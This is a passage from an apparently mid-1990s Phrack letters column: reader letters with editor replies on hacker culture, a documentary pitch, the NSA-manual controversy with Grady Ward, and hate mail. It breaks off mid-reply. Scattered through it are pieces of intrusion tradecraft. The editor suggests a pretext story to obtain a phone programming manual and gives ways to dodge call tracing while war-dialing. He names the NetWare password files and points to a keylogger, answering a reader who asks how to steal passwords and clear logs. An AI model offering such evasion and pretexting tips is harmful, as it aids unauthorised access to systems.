"Why, sonny, when I was your age the Apple II was king..."
|
|||
|
|
|||
|
Keep up the good work, and don't let the lamers get you down.
|
|||
|
|
|||
|
[Thanks for the letter. I personally thought the McDonald's file was
|
|||
|
a laugh riot. Even if it was juvenile and moronic, I wouldn't expect
|
|||
|
anyone to analyze it and go through with anything it contained. It was
|
|||
|
just for fun. Lighten up :)
|
|||
|
|
|||
|
I am glad to see that at least someone else recognizes that Phrack
|
|||
|
is attempting to serve as an archive of our subculture, rather than just
|
|||
|
a collection of technical info that will be outdated overnight, or a
|
|||
|
buglist that will be rendered mostly unusable within hours of release.
|
|||
|
|
|||
|
There is so much going on within the community, and it is becoming such a
|
|||
|
spectacle in the popular media, that in 20 years, we can all go back and
|
|||
|
look at Phrack and remember the people, places, and meetings that
|
|||
|
changed the face of the net.
|
|||
|
|
|||
|
Or maybe I'm just terribly lame, and either 1) refuse to put in the
|
|||
|
good stuff, 2) don't have access to the good stuff, 3) exist only as a
|
|||
|
puppet agent of The Man, or 4) Don't know nothin' 'bout Telco!
|
|||
|
But you know what they say about opinions.]
|
|||
|
|
|||
|
----------------------------------------------------------------------------
|
|||
|
|
|||
|
I have a few comments on your editorial in Phrack 44 (on information
|
|||
|
wants to be free). Thanks for voicing an opinion that is shared by many
|
|||
|
of us. I am glad to see a public figure in the CuG with nutz enuff to
|
|||
|
actually come out and make such a statement and mean it.
|
|||
|
Again, thanks.
|
|||
|
|
|||
|
Now on the subject of hacking as a whole. Is it just me, or are the number
|
|||
|
of losers on the increase? There have always been those who would try
|
|||
|
and apply these skills to ripoff scams and system trashing but now that
|
|||
|
seems to be the sole intent of many of the "hackers" I come into contact
|
|||
|
with. What ever happened to hacking to learn more about the system. To
|
|||
|
really hack a system (be it phone, computer), is a test of skill and
|
|||
|
determination, and upon success you walk away with a greater understanding
|
|||
|
of the machine and its software. Hacking is more than just knowing how
|
|||
|
to run crack on a filched password file, or using some exploitation
|
|||
|
scripts picked up on IRC, it is a quest for knowledge and gaining
|
|||
|
superiority over a system by use of great skill acquired by a deliberate
|
|||
|
effort. Once was a time when things like toll fraud (I do miss blue
|
|||
|
boxes) were a means to an end, now they seem to be the end in itself.
|
|||
|
|
|||
|
Also, I am researching info on OSI comsec procedures and have found some
|
|||
|
really interesting goodies, if you are interested in publishing
|
|||
|
my piece when completed, let me know..
|
|||
|
|
|||
|
[(NOTE: This came from a .mil)
|
|||
|
Man, I'm glad to see that people in the armed forces still have minds
|
|||
|
of their own. Not many people would express such a thing openly.
|
|||
|
|
|||
|
Yes, the destructive/profit-motivated trends of many of the hackers of
|
|||
|
today are pretty sad. But you have to realize, as the technology
|
|||
|
becomes more and more like consumer electronics, rather than the
|
|||
|
traditional mold of computer as scientific research tool, an entirely
|
|||
|
different market segment will be exposed to it and use the technology
|
|||
|
for less than scrupulous means.
|
|||
|
|
|||
|
Even the act of hacking itself. Today, I can basically gain access
|
|||
|
to any model of system known to man by asking. I realize that
|
|||
|
there are many who cannot accomplish such a thing, but with the
|
|||
|
proliferation of public access sites, almost everyone can afford
|
|||
|
access to the net to explore and learn. The point comes down to this:
|
|||
|
if you have an account on a Sun, why do you need an account on a Sun
|
|||
|
at Boeing, unless you either 1) want to sell the cad files of the 777 to
|
|||
|
Airbus or McDonnell-Douglas 2) want to get financial information to
|
|||
|
make a killing on Wall Street, or 3) just want to have an ego boost
|
|||
|
and say "I OWN BOEING!"
|
|||
|
|
|||
|
Personally, I can understand the ego boost aspect, but I've decided that
|
|||
|
I'd much rather get paid by a company like Boeing to hack for them
|
|||
|
than against them. I don't want to sell anyone's info, so hacking
|
|||
|
into any company is basically useless to me, unless they are paying me
|
|||
|
to look for potential weaknesses.
|
|||
|
|
|||
|
Granted, it's not an easy market to get into, but it's a goal to
|
|||
|
shoot for.
|
|||
|
|
|||
|
And for those who find it impossible to quit due to fear of losing
|
|||
|
their edge, check out my editorial in this issue for a possible
|
|||
|
solution.]
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
I am looking for a Macintosh app that does the same thing as an app
|
|||
|
called "Demon Dial" that has been lost in the annals of software
|
|||
|
history due to the fact that some people (sysops) question whether it
|
|||
|
is illegal software (it dials up a series of phone #'s looking for data
|
|||
|
connections). Do you know where I could find an application for the Mac
|
|||
|
that does this simple function?
|
|||
|
|
|||
|
[We had a guy ask in an earlier issue for Macintosh hacking/phreaking
|
|||
|
apps. Noone responded. Hell, I know SOMEONE has to use a Mac
|
|||
|
out there. Are you Mac-weenies all embarrassed to speak up?
|
|||
|
|
|||
|
Hell, uuencode and email me your aps, and I'll put them up for
|
|||
|
ftp! Help out your poor fellow Macintosh users. I certainly
|
|||
|
would if I could, but the thought of touching a Mac gives me the
|
|||
|
chills.]
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
Have you ever heard of being denied access to your own cell phone?
|
|||
|
I am currently in the process of buying a cell phone and was informed
|
|||
|
that I COULD NOT have the programming guide of the security code
|
|||
|
they enter to program my phone. In my opinion the key word is "MY."
|
|||
|
If I get a digital security system for my house you better damn well
|
|||
|
figure I will have the security codes for that. The phone was a Motorola
|
|||
|
flip phone. I called Motorola and explained how displeased I was with
|
|||
|
this company and they said they could not interfere with a reps. policy.
|
|||
|
When I was selling car phone we kept the programming guide unless they
|
|||
|
asked for it. I demanded it and they laughed in my face. Who said
|
|||
|
"the customer is always right" anyway?
|
|||
|
|
|||
|
Thanks, any info is greatly appreciated. By the way, you wouldn't
|
|||
|
happen to have the CN/A number for 815 would you? Also, any ANAC
|
|||
|
would be very helpful.
|
|||
|
|
|||
|
[Well, I hate to say it, but you got typical service from your
|
|||
|
cellular agent. Let's face it, these sales reps probably knew
|
|||
|
about as much about that programming manual as I do nuclear
|
|||
|
physics: "Its confusing, but if you understand it, you can fuck
|
|||
|
things up."
|
|||
|
|
|||
|
I am surprised that Motorola wouldn't sell you the book though.
|
|||
|
Motorola will sell anybody anything. You probably called the wrong
|
|||
|
place. Moto is so huge they've got multiple groups working on somewhat
|
|||
|
similar technologies with absolutely no communication between the groups.
|
|||
|
Sometimes they are in different countries, but sometimes they are in the
|
|||
|
same city! I would suggest you call a local FAE (Field Applications
|
|||
|
Engineer)
|
|||
|
and get them to get the book for you. Make up some story about
|
|||
|
working on some computer controlled application with the phone, and that
|
|||
|
you need any and all documentation on the phone. They'll do it. Money
|
|||
|
is money.
|
|||
|
|
|||
|
As far as the 815 CNA, hell, just call the business office. I haven't
|
|||
|
called a CNA in years, only the business office. They are nice people.
|
|||
|
And no PINs.
|
|||
|
|
|||
|
815 ANAC: ok guys, someone must have one...email it!
|
|||
|
|
|||
|
"The customer is always right" wasn't in Bartlett's or Columbia's
|
|||
|
books of famous quotations. I guess that phrase has been written out of out
|
|||
|
history. So, from now on you aren't always right, I guess.]
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
Dear Phrack:
|
|||
|
|
|||
|
|
|||
|
We want you!
|
|||
|
|
|||
|
We want you to be a part of our cutting edge documentary that is traversing
|
|||
|
across the "NEW EDGE" of computers, culture, and chaos.
|
|||
|
|
|||
|
Working in conjunction with Douglas Rushkoff, the best selling author of
|
|||
|
"CYBERIA," we are currently gathering together the leaders of this
|
|||
|
technological and cultural revolution. This is not a documentary in the
|
|||
|
traditional sense of the word. It is more of an exploration, a journey, a
|
|||
|
unique vision of the world as seen through the eyes of those who live on the
|
|||
|
bleeding edge; where technology, art, science, music, pleasure, and new
|
|||
|
thoughts collide. A place people like you and me like to call home.
|
|||
|
|
|||
|
"New Edge" will deliver a slice of creativity, insanity, and infallibility,
|
|||
|
and feed those who are hungry for more than what Main Street USA has to
|
|||
|
offer. This project will detonate across the US and around the world. It
|
|||
|
will become the who's who of the new frontier and you belong on it's
|
|||
|
illustrious list of futurians. Please look over the enclosed press release
|
|||
|
description of the project.
|
|||
|
|
|||
|
Phrack has long been the ultimate source for hack/phreak info, and helped to
|
|||
|
push the limits of free speech and information. The role that Phrack has
|
|||
|
played in the Steve Jackson Games Case set an important precedent for
|
|||
|
CyberLaw. We will also be interviewing several people from the EFF.
|
|||
|
|
|||
|
Please call me ASAP to schedule an interview for "New Edge", or send me
|
|||
|
E-Mail.
|
|||
|
|
|||
|
Sincerely,
|
|||
|
|
|||
|
Todd LeValley
|
|||
|
Producer, N E W E D G E
|
|||
|
(310) 545-8138 Tel/Fax
|
|||
|
belief@eworld.com
|
|||
|
|
|||
|
|
|||
|
W E L C O M E
|
|||
|
T O T H E
|
|||
|
W O R L D
|
|||
|
O N T H E
|
|||
|
E D G E O F
|
|||
|
T H E F U T U R E
|
|||
|
|
|||
|
|
|||
|
W E L C O M E
|
|||
|
T O T H E
|
|||
|
N E W E D G E
|
|||
|
-the documentary-
|
|||
|
|
|||
|
|
|||
|
T h e O r g a n i z a t i o n
|
|||
|
|
|||
|
Belief Productions in association with Film Forum.
|
|||
|
|
|||
|
T h e M i s s i o n
|
|||
|
|
|||
|
Journey through the labyrinth of cyberia and experience the people, places
|
|||
|
and philosophy that construct cyberspace and the shores of the technological
|
|||
|
frontier. This fast paced visual voyage through the digital revolution will
|
|||
|
feature interviews with the innovators, artists, cyberpunks, and visionaries
|
|||
|
from all sides of the planet. These specialists are the futurists who are
|
|||
|
engineering our cybergenic tomorrow in laboratories today. Along the way we
|
|||
|
will investigate the numerous social and political issues which are cropping
|
|||
|
up as each foot of fiber optic cable is laid. Artificial intelligence, the
|
|||
|
Internet, nanotechnology, interactive media, computer viruses, electronic
|
|||
|
music, and virtual reality are just a few of the many nodes our journey will
|
|||
|
explore.
|
|||
|
|
|||
|
T h e F u n d i n g
|
|||
|
|
|||
|
This exploration is sponsored in part by a grant from The Annenberg
|
|||
|
Foundation in association with the LA based non-profit cutting-edge media
|
|||
|
group Film Forum.
|
|||
|
|
|||
|
T h e P r o c e s s
|
|||
|
|
|||
|
The New Edge project will capture moving images with a variety of input
|
|||
|
devices and then assemble them into one fluid documentary using Apple
|
|||
|
Macintosh Quadras & PowerMac computers. The post production work will be
|
|||
|
done entirely on the computers using the Radius Video Vision Telecast Board
|
|||
|
in conjunction with Quicktime software applications such as Adobe Premiere
|
|||
|
4.0 and CoSA After Effects 2.01. The final piece will be recorded to BETACAM
|
|||
|
SP videotape for exhibition and distribution. The capture formats for the
|
|||
|
project will include: BETACAM SP, Super VHS, Hi-8, 16MM Film, Super-8 Film,
|
|||
|
35MM Stills, and the Fisher
|
|||
|
Price Pixelvision 2000.
|
|||
|
|
|||
|
T h e R e s u l t s
|
|||
|
|
|||
|
New Edge will pride itself on an innovative visual and aural style which
|
|||
|
before today, could only be created on high-end professional video systems
|
|||
|
and only for short format spots. The New Edge documentary will be two hours
|
|||
|
in length and will have a dense, layered look previously featured only in
|
|||
|
much shorter pieces. New Edge will be a showcase piece not only for the
|
|||
|
content contained within, but for the way in which the piece was produced.
|
|||
|
It will be a spectacular tribute to the products and technology involved in
|
|||
|
its creation.
|
|||
|
|
|||
|
D i s t r i b u t i o n
|
|||
|
|
|||
|
Direct Cinema - Distributes videos to Libraries, Schools, and Universities
|
|||
|
throughout the United States.
|
|||
|
|
|||
|
Mico Entertainment/NHK Enterprises - Provider of American programming for
|
|||
|
Japanese Television.
|
|||
|
|
|||
|
Labyrinth Media Ltd. - European reality-based documentary distributor
|
|||
|
|
|||
|
T h e A u d i e n c e
|
|||
|
|
|||
|
New Edge is aimed at both the technophiles and technophobes alike. While the
|
|||
|
show will feature very complex and sophisticated topics, the discussions will
|
|||
|
be structured to appeal to both those who do and do not have the technical
|
|||
|
framework that underlines the cyberian movement. The show's content and
|
|||
|
style will make it readily available to the MTV and Generation X demographic
|
|||
|
groups as well as executives who want to stay on top of the latest
|
|||
|
technological advances. Individuals who read Mondo 2000 and Wired magazine
|
|||
|
will also naturally latch on to this electronic
|
|||
|
presentation of their favorite topics.
|
|||
|
|
|||
|
T h e G u i d e s
|
|||
|
|
|||
|
Mike Goedecke - Director/Graphic Designer
|
|||
|
Mike was the Writer/Director/Cinematographer for the Interplay CD-ROM game
|
|||
|
entitled Sim City. Acting as graphic designer for the Voyager Co.- Criterion
|
|||
|
Laser Disc Division his work is featured on titles such as: Akira, DEVO-The
|
|||
|
Truth About De-Evolution, The Adventures of Baron Munchausen, and Spartacus.
|
|||
|
Most recently he collaborated with Los Angeles Video Artist Art Nomura on a
|
|||
|
video installation piece entitled Digital Mandala. The piece was edited,
|
|||
|
composited , and mastered to Laser Disc using an Apple Macintosh Computer and
|
|||
|
off-the-shelf software. The installation is scheduled to tour museums and
|
|||
|
art galleries across the United States and Europe. While attending
|
|||
|
Cinema/Television Graduate School at the University of Southern California,
|
|||
|
Mike directed the award winning documentary short Rhythm, which celebrates
|
|||
|
various musical cultures.
|
|||
|
|
|||
|
Todd LeValley - Producer/Graphic Designer
|
|||
|
Todd is the Producer/Director of CyberCulture: Visions From The New Edge, a
|
|||
|
documentary that introduces the electronic underground. This project has
|
|||
|
been warmly received at numerous "Cyber Festivals" around the country, as
|
|||
|
well as at the Director's Guild Of America, and is currently being
|
|||
|
distributed by FringeWare Inc. Todd's commercial experience includes being
|
|||
|
the in-house graphic designer for Barbour/Langley Productions designing,
|
|||
|
compositing, and producing the graphic packages for several 20th Century Fox
|
|||
|
Television pilots and The Sci-Fi Trader for the USA Network/Sci-Fi Channel.
|
|||
|
Todd is a graduate of the Cinema/Television program at Loyola Marymount
|
|||
|
University.
|
|||
|
|
|||
|
Jeff Runyan - Cinematographer/Editor
|
|||
|
Jeff received an MFA from the University of Southern California's Graduate
|
|||
|
School of Cinema/Television with an emphasis in cinematography and editing.
|
|||
|
He studied cinematography under the guidance of Woody Omens, ASC. and Earl
|
|||
|
Rath, ASC., and editing with Edward Dmytryk. Jeff was the cinematographer on
|
|||
|
the award wining documentary Rhythm. He has recently completed shooting and
|
|||
|
editing a documentary on Academy Award winning Cinematographer Conrad Hall
|
|||
|
for the ASC and has just finished directing a short film for USC
|
|||
|
Teleproductions.
|
|||
|
|
|||
|
Douglas Rushkoff - Cyber Consultant/Author
|
|||
|
Douglas is the author of the best selling Harper Collins San Francisco novel,
|
|||
|
Cyberia. He spent two years of his life living among the key players in the
|
|||
|
cyber universe. Douglas knows the New Edge well and is providing us with the
|
|||
|
map to its points of interest, rest stops and travelers.
|
|||
|
|
|||
|
For more information, please contact:
|
|||
|
Todd LeValley, Producer
|
|||
|
Belief Productions
|
|||
|
(310) 545-8138
|
|||
|
belief@eworld.com
|
|||
|
|
|||
|
[Dear New Edge:
|
|||
|
|
|||
|
You have got to be kidding me. "Readers of Wired and Mondo 2000 will
|
|||
|
naturally latch on to this electronic presentation of their favorite
|
|||
|
topics?"
|
|||
|
|
|||
|
Aren't we awful fucking high on ourselves? Christ. Mondo & Wired
|
|||
|
readers and writers (and stars) are themselves so fucking far removed
|
|||
|
from the real meat of the underground, that they wouldn't
|
|||
|
even be able to relate to it. Obviously this "documentary"
|
|||
|
is going to be aimed at the wannabes who sit at home furiously
|
|||
|
masturbating to "Cyborgasm" while installing FRACTINT, being very
|
|||
|
careful not to soil their copy of "The Hacker Crackdown." Oh joy.
|
|||
|
|
|||
|
These guys are so fucking out of it, they sent me two letters.
|
|||
|
One addressed to Phrack, the other to Phrack / Emmanuel Goldstein.
|
|||
|
Maybe they think we're 2600.
|
|||
|
|
|||
|
CYBER-COUNT: 12 occurrences.
|
|||
|
|
|||
|
That's kind of low. I'm surprised your public relations people didn't
|
|||
|
have you add in a few more cyber-this's or cyber-that's into the
|
|||
|
blurb. Gotta keep that cyber-count high if you want to get those
|
|||
|
digi-bucks out of those cyberians! CYBER!!!
|
|||
|
|
|||
|
Read my review of Cyberia guys...find a new pop-fad to
|
|||
|
milk for cash.]
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
In less than 3 weeks, I will be leaving for Basic Training. Once out of
|
|||
|
there, I will be working on Satellite Data Transmissions for the US
|
|||
|
Army. I am highly excited, just waiting to see what type of computers
|
|||
|
I will be working on. Anyways, I will be enrolled in a 32-week
|
|||
|
accelerated technical class teaching me all about satellites, and
|
|||
|
the computers that I will be using. Here's the kick. I'll be writing
|
|||
|
a series of Tech Journals detailing the workings/operations of/weaknesses,
|
|||
|
and the use of the systems. I was wondering if you would be interested
|
|||
|
in carrying these. I've read Phrack for a long time, but it is an off
|
|||
|
the wall subject. I'll also be playing with the military phone system,
|
|||
|
in hopes of finding out what the ABCD tones do. (I heard from a file
|
|||
|
that Military phones utilize them but I'm still a civilian, and am
|
|||
|
clueless).
|
|||
|
|
|||
|
Thanks for keeping me informed
|
|||
|
Kalisti!
|
|||
|
|
|||
|
[Sorry to hear about your impending Basic Training. I'm not big on
|
|||
|
the military, as they would make me chop off all my hair.
|
|||
|
|
|||
|
About the Satellite systems: YES If you do indeed find time to write
|
|||
|
up any files on how they work, systems involved, weaknesses, etc.
|
|||
|
I'D LOVE TO PRINT THAT! Just make sure you don't blow your clearance.
|
|||
|
|
|||
|
Satellites are very cool. I'm about to buy a Ku Band disk to do some
|
|||
|
packet radio type stuff. A bit low-tech compared to the Army, but hell,
|
|||
|
I'm on a budget.
|
|||
|
|
|||
|
ABCD...they are used for prioritizing calls on AUTOVON. FTS doesn't
|
|||
|
use them (I think), and they can only be used on certain lines.
|
|||
|
|
|||
|
They are:
|
|||
|
|
|||
|
A = priority
|
|||
|
B = priority override
|
|||
|
C = flash
|
|||
|
D = flash override
|
|||
|
|
|||
|
For instance, if you want to make it known that this is an important
|
|||
|
call, you hit the "a" button before dialing. It establishes a
|
|||
|
priority-class call, which may cause a light to come on or something
|
|||
|
as equally attention grabbing at the called party's end. Priority
|
|||
|
calls cannot be interrupted, except by a Priority Override" etc,
|
|||
|
with Flash Override being the highest class.
|
|||
|
|
|||
|
If you do these from an improper line, you will get an error message.
|
|||
|
The one I used to get when BS'ing AUTOVON op's long ago
|
|||
|
was "The President's use of this line is not authorized." Funny.
|
|||
|
|
|||
|
Let me know if any of this is still valid.]
|
|||
|
|
|||
|
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
Dear Phrack,
|
|||
|
The following is a copy of a Toneloc found file my friend got. As happens
|
|||
|
to my friend a lot the numbers aren't valid. But, you'll see he found at least
|
|||
|
one System 75. It appears that the 75 had a tracer installed on it already.
|
|||
|
My friend did not get a call back on it, and nothing has been done as far
|
|||
|
as we know. But, I still wonder -- Is scanning no longer safe?
|
|||
|
|
|||
|
|
|||
|
Castor [612]
|
|||
|
|
|||
|
56X-XXXX 22:57:34 03-Apr-94 C CONNECT 1200
|
|||
|
|
|||
|
Login: b
|
|||
|
Password:
|
|||
|
INCORRECT LOGIN
|
|||
|
|
|||
|
Login: c
|
|||
|
Password:
|
|||
|
INCORRECT LOGIN
|
|||
|
|
|||
|
56X-XXXX 23:04:12 03-Apr-94 C CONNECT 1200
|
|||
|
|
|||
|
c
|
|||
|
Unknown command error
|
|||
|
Ready
|
|||
|
d
|
|||
|
Unknown command error
|
|||
|
Ready
|
|||
|
e
|
|||
|
Unknown command error
|
|||
|
Ready
|
|||
|
b
|
|||
|
Unknown command error
|
|||
|
Ready
|
|||
|
|
|||
|
56X-XXXX 23:49:19 03-Apr-94 C CONNECT 1200
|
|||
|
|
|||
|
KEYBOARD LOCKED, WAIT FOR LOGIN
|
|||
|
[1;24r [1;1H [0J
|
|||
|
|
|||
|
Login: b
|
|||
|
Password:
|
|||
|
INCORRECT LOGIN
|
|||
|
|
|||
|
56X-XXXX 01:23:28 04-Apr-94 C CONNECT 1200
|
|||
|
|
|||
|
Login: b
|
|||
|
Password:
|
|||
|
INCORRECT LOGIN
|
|||
|
|
|||
|
Call traced to 612-XXX-XXXX.
|
|||
|
Saving number in security log for further investigation.
|
|||
|
|
|||
|
[Jeez. That sure does suck.
|
|||
|
|
|||
|
Well, live and learn kiddoes. 1994 is not the time to be hacking
|
|||
|
by direct dialing local numbers. It's just not all that smart.
|
|||
|
|
|||
|
Caller-ID has been tariffed in a lot of RBOCS. A lot of modem
|
|||
|
manufacturers implemented caller-id features into their equipment.
|
|||
|
Having these features in the equipment means that it won't be long
|
|||
|
before people redesign all their login programs to make use of
|
|||
|
these features. I would.
|
|||
|
|
|||
|
I've got an ISDN line. Every time I call out, the SPID (phone number)
|
|||
|
of the B channel I'm using is broadcast. There is nothing I can do
|
|||
|
about that. On a remote connection, almost all decent ISDN terminal
|
|||
|
adaptors have the option to block any SPID they don't know. They won't
|
|||
|
even answer the phone, because they receive and interpret the phone
|
|||
|
number before any session is established.
|
|||
|
|
|||
|
Yeah, well, that's ISDN, but it will not take a genius to do a few
|
|||
|
quick hacks on some linux box and we will suddenly be inundated with all
|
|||
|
kinds of "security packages" that use modems with Caller-ID.
|
|||
|
|
|||
|
Yeah, I know, *67 (or whatever it is) to block the data, or
|
|||
|
route the call through another carrier so the data won't get passed
|
|||
|
(10288-NXX-XXXX). The data is still in the system, just not being
|
|||
|
transmitted from the switch out to the party being called.
|
|||
|
|
|||
|
It amazes me how many really smart people I know have been busted
|
|||
|
solely because they were hacking local systems and calling them
|
|||
|
directly.
|
|||
|
|
|||
|
Scanning has always been a very tricky subject. Since you are paying
|
|||
|
for a phone line, and if you have flat-rate service, you are
|
|||
|
thereby entitled to call as many numbers as you want. The big issue
|
|||
|
a while back was dialing sequentially (which set some telcos on a rampage
|
|||
|
because call usage patterns looked like telemarketing machines).
|
|||
|
The other problem is harassment. One call to an individual is a wrong
|
|||
|
number. Two is bordering on harassment. So, doing a complete scan
|
|||
|
and calling the carriers back through some other method would be
|
|||
|
a fairly good idea. And always have your calls forwarded to a
|
|||
|
non-working number so the 5,000 assholes who call-return you
|
|||
|
during the scan won't interfere.
|
|||
|
|
|||
|
If you are lucky enough to live in the boonies, you are probably
|
|||
|
still somewhat safe, but everyone else...be careful.]
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
Phrack-
|
|||
|
|
|||
|
I was wondering if anyone has ever done an article on breaking
|
|||
|
Novell Network through a workstation. I've heard it can be done through
|
|||
|
the SysAdmin computer, but is there a way to find the userlist and
|
|||
|
passwords? Also how would I go about cleaning up after myself so as to
|
|||
|
not leave a trace on the logs. I would appreciate a way other than screen
|
|||
|
capture, but if anyone knows of a good boot record booting program to
|
|||
|
do a capture of every key typed that would be great, and maybe it
|
|||
|
could be uuencoded in the next Phrack!
|
|||
|
|
|||
|
Thanks again for making the best, ass kickin', a step above the
|
|||
|
rest, brain moving, earth shaking, body shivering, fist shaking, totally
|
|||
|
bitchin', muy excelente, awesome H/P magazine in the whole world! :)
|
|||
|
|
|||
|
Sincerely,
|
|||
|
|
|||
|
The Warden
|
|||
|
|
|||
|
[Thanks for the compliments...
|
|||
|
|
|||
|
About your question though, I'm not quite sure what you mean.
|
|||
|
In a NetWare environment there really isn't any userlist and passwords
|
|||
|
that you can get at. You can run the syscon utility and look at all the
|
|||
|
usernames, but not much more. The passwords are stored in what's known
|
|||
|
as the "bindery." These are 3 files in the sys/system directory
|
|||
|
called NET$OBJ.SYS, NET$VAL.SYS, and NET$PROP.SYS. If you can
|
|||
|
pull a password out of those files, I will shit in my hat and eat it.
|
|||
|
|
|||
|
Beyond that, yes, a key-capture program is definitely the ideal
|
|||
|
solution for monitoring activity on a PC workstation. There is
|
|||
|
one in this issue.]
|
|||
|
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
Hi,
|
|||
|
I've Been reading your magazine for a long time now, my eyes light up when
|
|||
|
I see an advert for a UK BBS with related hacking/phreaking articles or files
|
|||
|
on it, but when I try to ring them they are usually gone.
|
|||
|
I've been searching for ages for BBS's in the UK with these kind of articles
|
|||
|
on them but I've had no luck, Even postings on the USENET had little results.
|
|||
|
I have had a few boards which are shady but they ask unusual questions about
|
|||
|
abiding to rules/laws about hacking then they prompt with fake login and
|
|||
|
registration schemes.
|
|||
|
|
|||
|
If you have some, could you possibly send or publish a list of shady UK BBS's
|
|||
|
Id be extremely grateful
|
|||
|
|
|||
|
Cheers,
|
|||
|
|
|||
|
Steven
|
|||
|
|
|||
|
[Steven:
|
|||
|
|
|||
|
Hell, I don't even know the numbers to any "shady" bulletin boards here
|
|||
|
in America. The only UK hacker bbs I knew of in recent years was
|
|||
|
Unauthorised Access, but I'm sure that's the advert you are referring to.
|
|||
|
|
|||
|
Maybe someone else in the UK knows something decent to call over there.
|
|||
|
Any takers? ]
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
[THE GRADY FILES]
|
|||
|
|
|||
|
Many of you may remember the NSA Security Manual we published last
|
|||
|
issue. That single file generated more press and hype than I'd
|
|||
|
seen in a long time. It was mentioned in several newspapers, it
|
|||
|
appeared on television. It was ridiculous. The document is
|
|||
|
available to anyone who can fill out a FIOA request.
|
|||
|
|
|||
|
Regardless, people went zany. At first I couldn't figure out
|
|||
|
why everyone was so worked up, and then I caught wind of Grady
|
|||
|
Ward. Grady had posted the document to the net (with all mention
|
|||
|
of Phrack deleted from it) in several USENET forums alt.politics.org.nsa,
|
|||
|
talk.politics.crypto and comp.org.eff.talk. Several readers of
|
|||
|
Phrack were quick to jump up and point out that Grady had obtained
|
|||
|
it from the magazine (thanks guys!) which he grudgingly admitted.
|
|||
|
Grady got to be in the spotlight for a while as the Phrack/NSA Handbook
|
|||
|
thread continued to grow.
|
|||
|
|
|||
|
In the meantime, Grady was either calling, or giving him the
|
|||
|
benefit of the doubt, getting called by an awful lot of press.
|
|||
|
And even more compelling is the way he'd began pronouncing my
|
|||
|
impending federal raid on so many newsgroups.
|
|||
|
|
|||
|
And of course, I don't have time to read any of that USENET crap
|
|||
|
so I'm oblivious to all of this. Then I got a message from Grady.
|
|||
|
|
|||
|
[GRADY WRITES]
|
|||
|
|
|||
|
You might want to get ready for the FBI
|
|||
|
serving a warrant on you for information
|
|||
|
about the NSA security employee manual
|
|||
|
published in Phrack 45;
|
|||
|
the NSA security people called me about 10 minutes
|
|||
|
ago to talk about how it got on the net.
|
|||
|
|
|||
|
I being very cooperative, gave him
|
|||
|
your address in Austin.
|
|||
|
|
|||
|
Grady
|
|||
|
707-826-7715
|
|||
|
|
|||
|
[I REPLY]
|
|||
|
|
|||
|
Get a grip.
|
|||
|
|
|||
|
Nothing that was contained in that file could not
|
|||
|
be obtained through other sources.
|
|||
|
|
|||
|
|
|||
|
[GRADY REPLIES]
|
|||
|
|
|||
|
Just because you did nothing illegal, doesn't mean that
|
|||
|
you won't be annoyed by the FBI. Generally they will
|
|||
|
be very polite however.
|
|||
|
|
|||
|
Gripping. Now what?
|
|||
|
|
|||
|
[I REPLY]
|
|||
|
|
|||
|
Ok,
|
|||
|
|
|||
|
If someone actually did contact you, what was his name and number.
|
|||
|
I will forward that to my lawyer.
|
|||
|
|
|||
|
[GRADY REPLIES]
|
|||
|
|
|||
|
I have received your mail regarding "Re: NSA"
|
|||
|
It will be read immediately when I return.
|
|||
|
|
|||
|
If you are seeking more information on the
|
|||
|
Moby lexical databases, please run
|
|||
|
|
|||
|
finger grady@netcom.com
|
|||
|
|
|||
|
for general information or help downloading
|
|||
|
live samples and a postscript version of our
|
|||
|
current brochure via anonymous ftp.
|
|||
|
|
|||
|
Thanks - Grady Ward
|
|||
|
|
|||
|
-------------------
|
|||
|
|
|||
|
He never answered my mail.
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
Dear Sir:
|
|||
|
|
|||
|
Please refrain from sending such material to this address in the future!
|
|||
|
Since this address has been usubscribed from the Phrack mailing list,
|
|||
|
it means that further mailings are undesirable.
|
|||
|
|
|||
|
I would also wish to remind you that maintaining lists of people's email
|
|||
|
without consent is quite immoral and devious. How hypocritical of
|
|||
|
you, who decry all such behavior when it is practiced by corporations
|
|||
|
or governments.
|
|||
|
|
|||
|
Thank you.
|
|||
|
robbie@mundoe.maths.mu.oz.au
|
|||
|
|
|||
|
[PHRACK EDITOR ABUSES POWER:
|
|||
|
|
|||
|
Dear Sir:
|
|||
|
|
|||
|
Please excuse the mailing. Have you ever heard of a mistake?
|
|||
|
Have you ever heard of an oversight?
|
|||
|
|
|||
|
Is it really that much of an inconvenience for you to hit the "d" key
|
|||
|
to remove one small piece of unwanted mail?
|
|||
|
|
|||
|
This being said, I would also like to invite you to go fuck yourself.
|
|||
|
|
|||
|
** I guess this guy does not like to get unsolicited mail **]
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
You people really piss me off! You're undermining the fun and
|
|||
|
enjoyment of the rest of the internet users just for your juvenile
|
|||
|
games and illegal activities. Do you realize how much better off we'd
|
|||
|
be if you all just went away and left the Net to honest people like me?
|
|||
|
There is no place in today's society for a bunch of maladjusted
|
|||
|
paranoid psychotics like yourselves. Please do all of us users a favor
|
|||
|
and go jump in a river.
|
|||
|
|
|||
|
Kevin Barnes
|
|||
|
kebar@netcom.com
|
|||
|
|
|||
|
[ABUSE OF POWER CONTINUES...WILL ERIKB EVER STOP?
|
|||
|
|
|||
|
Hey Keith:
|
|||
|
|
|||
|
Thanks a lot for the letter!
|
|||
|
|
|||
|
You know, it does my heart good to hear from such kind and caring
|
|||
|
folks like yourself. It's so fortunate for the Internet that there are
|
|||
|
people like yourself who take it upon themselves to become martyrs for
|
|||
|
their causes and express their ideals in such an intelligent manner.
|
|||
|
|
|||
|
It's fascinating to me that you can send such email sight-unseen.
|
|||
|
Do you know who you are writing to? Do you even have the slightest
|
|||
|
idea? What do you hope to accomplish? Do you have any idea?
|
|||
|
|
|||
|
This particular "maladjusted paranoid psychotic" to whom you have so
|
|||
|
eloquently addressed is an engineer in the R&D of a Fortune 500 computer
|
|||
|
company, and that along with outside consulting will net me about
|
|||
|
